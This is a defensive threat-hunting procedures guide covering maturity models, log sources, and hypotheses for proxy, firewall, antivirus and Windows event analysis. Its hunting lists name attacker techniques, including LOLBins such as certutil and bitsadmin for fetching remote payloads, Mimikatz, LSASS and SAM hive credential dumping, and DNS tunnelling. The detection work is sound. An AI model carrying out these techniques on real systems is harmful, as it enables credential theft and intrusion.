Table of Content

CONTENTS
INTRO TO HUNTING............................................................................................................................ 02

THREAT HUNTING MATURITY MODEL ................................................................................................. 02

BASIC REQUIREMENT FOR THREAT HUNTING ...................................................................................... 03

THE PYRAMID OF PAIN ....................................................................................................................... 04

IMPORTANCE OF THREAT INTELLIGENCE IN THREAT HUNTING ............................................................ 04

PROCESS TO CONDUCT THREAT HUNTING ........................................................................................... 05

RISK RATING MEASUREMENT MATRIX ................................................................................................ 11

1|Page
 Threat Hunting Procedures
1. Intro to Hunting – What it is, Why It’s Important,
Hunting is a proactive, hypothesis-based investigation process of cyber-attacks. Threat hunting is the
human-driven, proactive and iterative search through networks, endpoints, or datasets to detect
malicious, suspicious, or risky activities that have evaded detection by existing automated tools.
Threat hunting has been around for a while, but it has only recently become a focus of modern
enterprise Security Operation Centres (SOCs). Hunting can revolutionize the threat detection efforts
of an organization,
The purpose of hunting is specifically to find what is escaped by the automated alerting and
monitoring systems. Hunting is searching for anomalies by patrolling through data, rather than
investigating a call in from SIEM.
It is also important to keep in mind that successful hunting is tied to capabilities in three different
areas:

Figure 1: A Successful Threat-hunting technique

2. Threat Hunting Maturity Model

As mentioned, there are many kinds of techniques and practices that an analyst can pursue in hunting.
Hunting maturity is a measure of what kinds of techniques and data analyst can work with. To help
assess the current hunting capabilities and determine how analyst should be aiming to grow them,
below is the reference of the Hunting Maturity Model (HMM).

(the Hunting Maturity Model is just a prescriptive model, and many organizations will sometimes be
at varying levels of capabilities: excelling at some criteria and less advanced in others)

2|Page
 Figure 2: Threat-hunting maturity model

The Hunting Maturity Model describes five levels of an organization’s proactive detection capability.
Each level of maturity corresponds to how effectively an organization can hunt based on the data
they collect, their ability to follow and create data analysis procedures (DAP), and their level of
hunting automation. The HMM can be used by analysts and managers to measure current maturity
and provide a roadmap for improvement. Often these improvements focus on a combination of tools,
processes, and personnel.

3. Basic Requirement for Threat Hunting

Analytical Mindset: This is, without question, the most important skill an analyst can possess.
Without the innate curiosity in and pursuit of the “huh … that’s weird,” an analyst can have all the
data in the world, but they will inevitably find themselves missing pieces of the puzzle. The analyst
needs to be able to make reasoned assumptions and chart a new course when the trail runs cold.

Log Analysis: Logs from services and devices are just a couple of the most important and underutilized
sources of intelligence for any security department. The ability to analyze logs for anomalies and pivot
between data sources to see the big picture is a key competency.

Network Forensics: The ability to read and understand packet capture data and determine the
malicious nature of network traffic. If you’re fortunate enough to extend your NSM capabilities to the
endpoint with an EDR product, a sound foundation in host-based forensics is key to compliment your
network knowledge.

Network Architecture: An understanding of different network devices and how they operate within
the environment.

Attacker Lifecycle: Understanding the different events that happen at any given stage in an attack
lifecycle will better prepare your analysts to compartmentalize and prioritize their findings and
activities.
3|Page
Tools: This is an incredibly broad area, but at a foundational level, an understanding of how log
aggregators ingest data as well as the function of packet capture analysis tools are essential for the
analyst to understand.

OS Architecture: Different operating systems represent different attack vectors. A strong grasp of
Windows- and Linux-based operating systems is essential.

Attack Methods: Exploit Kits, Malware, Phishing, and software misconfigurations. Understanding
how an attacker attempts to penetrate your network is key to hunting for indicators of the behavior.

4. The Pyramid of Pain

The Pyramid of Pain is the simple diagram shows the relationship between the types of indicators
that analyst might use to detect an adversary’s activities and how much pain it will cause to analyst
to detect the indicators of an incident/attack.

Figure 3: Pyramid of Pain – Threat-hunting

5. Importance of Threat Intelligence in Threat Hunting

Threat Intelligence or Cyber Threat Intelligence (CTI) is a part of cybersecurity that focuses on the
analysis and collection of information on both potential and current cyber-attacks that threaten the
security of an organization or its assets. Cyber Threat Intelligence is a proactive security measure that
prevents data or security breaches and saves the financial cost required to clean up such a mess after
a breach.

4|Page
CTI’s main objective is to provide companies an in-depth understanding about the cyber-threats that
poses the greatest risks to their infrastructure and how to protect their business in the long run

Cyber threat intelligence gathers raw information about new and existing threat actors from many
different sources. CTI teams then analyze the collected data to produce appropriate threat
intelligence management and feeds reports full of only the most important information that can be
utilized by automated security control solutions and management to make security decisions for the
company. The fundamental purpose of this kind of security is that it helps to keep companies
informed of the advanced threats and exploits.

6. Process to Conduct Threat Hunting

Threat hunting process starts with collecting the logs of all the sources such as security
solution, database, servers, application logs etc. the best and easy method to collect the
logs is to use the log management device such as SIEM. After the collecting the logs and
normalizing the logs the next step is to develop the hypothesis and apply on the output of
data to start the hunting.

I. Gathering Data: Collect, Normalize, Analyse

The following are some of the types of logs that may be important to collect in the organization
environment:
• Configuration Management Database (CMDB)
• Application/service logs
• DHCP
• Proxy
• Web and Application Server
• Active Directory/LDAP
• Domain Name Service (DNS)
• Application Firewall
• Database Application and Transaction
• Host-based logs
• Host/Network IDS/IPS
• Firewall
• Antivirus
• Host-based logs
• Operating System (e.g., Windows Event and UNIX Syslog)
• Endpoint Detection Response (EDR)
• Virtual Machine Hypervisor
• Network infrastructure logs
• VPN
• Router
• Firewall
• Load Balancer

The below graphic is defining the data collection framework which is designed to help organizations
focus on discovering and qualifying the security incidents and attack.

5|Page
 Figure 4: Data Collection Framework

II. Development of Hypothesis for Threat-hunting

After collecting, normalizing and analyzing the data, then next step is to development the hypothesis
and apply it on the output of data to start hunting. Below is the list of sources which helps to develops
the advance threat hunting hypothesis:

Internal Sources: internal sources are those data which generates in the boundary of an organisation
such as past incidents, SIEM alerts, VA/PT reports etc. these data sources are very important and
helpful for threat hunter to build the hypothesis. The hypothesis which are built on the internal data
sources are very much effective and realistic. Below are some examples of internal sources:

• Past incidents
• Reconnaissance attempts against your infrastructure
• Threats to specific line of business and industry verticals
• Threats to customers’ intellectual property
• VA/PT reports

External Sources: the external sources for development of hypothesis are those data which are
generates outside of the boundary of an organisation or data publish by the other vendors such as
Threat intel feeds, TTP’s of an attack, OSINT, threat advisories, govt. advisories, etc. The hypothesis
which are builds on the external sources are proactive hypothesis which are one step ahead then the
monitoring system. Below are some examples of external sources:

6|Page
 Figure 5: MITRE ATT&CK Refresher
MIRTE ATT&CK Recent Developments: https://attack.mitre.org/resources/updates/

• Paid intelligence feeds

• Open Source Intelligence (OSINT)
• Partnerships with government agencies
• Security Advisories
• TTP of an attack
• Cyber Kill Chain

III. List of Threat-hunting Hypothesis

Below is the list of some basic threat hunting hypothesis:

1. Proxy Logs Traffic Analysis Hypothesis

I. Hypothesis: Bytes uploaded stats/Data upload

Hunt For: Session uploaded data > 1 MB
Possible Threat: Data exfiltration
Format: Number of bytes, client IP, server IP, server port
II. Hypothesis: Bytes downloaded stats/file download
Hunt For: Session downloaded data > 3 MB
Possible Threat: Attacker downloading attack tools
Format: Number of bytes, client IP, server IP, server port

III. Hypothesis: HTTP host header/traffic on malicious domain/URL categories

Hunt For: Hosts not ending with .com | .net | .org & host length > 30 char
Possible Threat: DGA, suspicious domains (i.e. http://bit.ly/2jKNAhi or HTTP
traffic to an IP address instead of FQDN)
Format: Traffic Count, HTTP host, URL Categories

7|Page
 IV. Hypothesis: HTTP referrer header
Hunt For: Malicious referring domains
Possible Threat: Watering hole and JS exploit kits
Format: Count, HTTP referrer, HTTP status code (302)

V. Hypothesis: HTTP user-agent header

Hunt For: Uncommon or non-existing User-Agents
Possible Threat: Malicious traffic
Format: Count, HTTP user-agent, HTTP status code

VI. Hypothesis: HTTP request methods/Suspicious HTTP request

Hunt For: Methods other than GET/POST
Possible Threat: Uploads (PUT method), tunnelling (CONNECT method) and
injection
Format: traffic count, HTTP method

VII. Hypothesis: HTTP number of requests/beaconing on suspicious domains

Hunt For: Clients sending increasing number of HTTP requests
Possible Threat: Beacons, tunnelling, and data exfiltration
Format: Count of traffic, client IP, server IP, Domain name, HTTP status code

2. Firewall Traffic Analysis Hypothesis

I. Hypothesis: SSH sessions

Hunt For: Unexpected connections
Possible Threat: Recon and lateral movements
Format: Count of traffic, client IP, server IP, server port

II. Hypothesis: RDP sessions/Unauthorized Remote desktop connection

Hunt For: Unexpected RDP clients/servers
Possible Threat: Lateral movements
Format: Count of traffic, client IP, server IP, server port

III. Hypothesis: IRC sessions/Suspicious malware communication

Hunt For: IRC clients
Possible Threat: C&C traffic and potential insider
Format: Count of traffic, client IP, server IP, server port

IV. Hypothesis: FTP sessions/Data exfiltration

Hunt For: Unexpected FTP clients/server
Possible Threat: Lateral movements or data exfiltration

8|Page
 Format: Count of traffic, Client IP, Server IP, Server port

V. Hypothesis: TCP listening ports on private IPs/Inbound Traffic on critical ports

Hunt For: Unauthorized service
Possible Threat: Backdoors
Format: Count of sessions, TCP port, server IP, protocol

VI. Hypothesis: TCP listening ports on public IPs/outbound connection on suspicious IP

Hunt For: Abnormal port / protocol combination (i.e. non-HTTP carried
over port 80)
Possible Threat: Unauthorized communication channel
Format: Count of sessions, TCP port, protocol

3. Antivirus Traffic Analysis Hypothesis

I. Hypothesis: Continues Malware infection on system

Hunt For: Recurring/Malware reinfection
Possible Threat:
Format: Virus name, infected file, File Hash value, count of infection

II. Hypothesis: Uncleaned malware infection

Hunt For: Uncleaned malware
Possible Threat: New Malware/ransomware without signature
Format: Action Taken, Virus name, infected file, File Hash value, count of infection

4. Windows logs Analysis Hypothesis

I. Hypothesis: Details Tracking events/Process Creation

Hunt For: suspicious Process Created by Attacker/malware
Possible Threat: APT threat, New Malware
Format: Event ID 4688, 4689, New process name, Creator Process Name, Logon ID, Account
Name

II. Hypothesis: User added to privilege group

Hunt For: ATP Expansion/Privilege escalation
Possible Threat: APT Attack/
Format: event id 4732, 4728, 4756, 4746, 4751, 4761, Account name, Logon ID,

III. Hypothesis: Detection of Mimikatz

Hunt For: Credential dumps
Possible Threat: APT Attack/
Format: event ID 4688, 4689, event data image: lsass.exe, Mimikatz.exe.

9|Page
 5. Other Hunting Hypothesis

• Hunt for File-less Malware

• Hunt for Malware
• Hunt for Lateral Movements
• Hunt for Windows Event IDs
• Hunt for group policy violations
• Hunt for Network Beaconing
• Hunt for Insider Privilege Escalation
• Hunt for Privilege failures
• Hunt for PowerShell Errors
• Hunt for PowerShell Traces
• Hunt for Login Failures on Critical Servers
• Hunt for vulnerabilities
• Hunt for Persistence Threats
• Hunt for Registry violations
• Hunt for Network traffic denied by firewalls or IPs
• Hunt for Unusual DNS requests - either to malicious domains or internal flaws
• Hunt for Signs of DDoS activity and geographic irregularities
• Hunt for Mismatched port-application traffic
• Hunt for Unusual north-south or east-west network traffic
• Hunt for Anomalies
• Hunt for Unknown Network Shares
• Hunt for Network Recon tools
• Hunt for brute force RDP attempts
• Hunt for Suspicious File Types
• Hunt for Windows Admin Shares
• Hunt for RDP. PSEXEC, Task created, Task scheduled, WMI, Services created
• Hunt for Parent/Child relationships - Process
• Hunt for Parent/Child relationships - MS Office
• Hunt for Parent/Child relationships - Cmd
• Hunt for Parent/Child relationships - PowerShell
• Hunt for Parent/Child relationships - Memory
• Hunt for Process Injection
• Hunt for Windows onelinersto download remote payload - below ref:
• Possible tools: powershell.exe, wmic.exe, regsvr32, rundll32.exe, mshta.exe, regasm.exe,
regsvc.exe, odbcconf.exe, msbuild.exe, certutil.exe, bitsadmin.exe
• Hunt for Masquerading
• Hunt for Privilege Escalation - Access token manipulation
• Hunt for Privilege Escalation - Weak service permissions
• Hunt for UAC Bypass
• Hunt for Credential Dumping
• Hunt for Credentials Dumping - Dump SAM/SECURITY registry hives
• Hunt for Credentials Dumping - Shadow Copies
• Hunt for Mimikatz cmds / Hunting DCShadow
• Hunt for Credentials Dumping - LSASS memory access
10 | P a g e
 • Hunt for Suspicious Services. Services that run executables from %systemroot%.
• Hunt for Suspicious Services. Services that run PowerShell
• Hunt for Beaconing
• Hunt for BOT Activity
• Hunt for Malicious Domains & DNS Tunneling

7. Risk Rating Measurement Matrix

This rating is reserved for threats that will result in an impact to the organization.

HIGH
A threat is categorized as HIGH if:

• it involves critical organization assets

• attempts to evade standard signature-based detections
• exfiltrates data outside the organization
• attempts to create a communication link with external Command & Control
• it results in direct reputational or financial loss for the organization

MEDIUM
A threat is categorized as MEDIUM if:

• it involves limited infections at endpoints

• malwares on system which cannot be cleaned/deleted/quarantined
• attempts to connect externally which get blocked
• access to suspicious domains or IP addresses

LOW
A threat is categorized as LOW if:

• if it involves attempts of attacks from external sources

• threats related security misconfiguration in systems
• access to non-standard or non-business domains or IP addresses
• involves installation of unnecessary applications (not necessarily malicious)

Prepared By:
-Vishal Kumar
Threat Analyst

11 | P a g e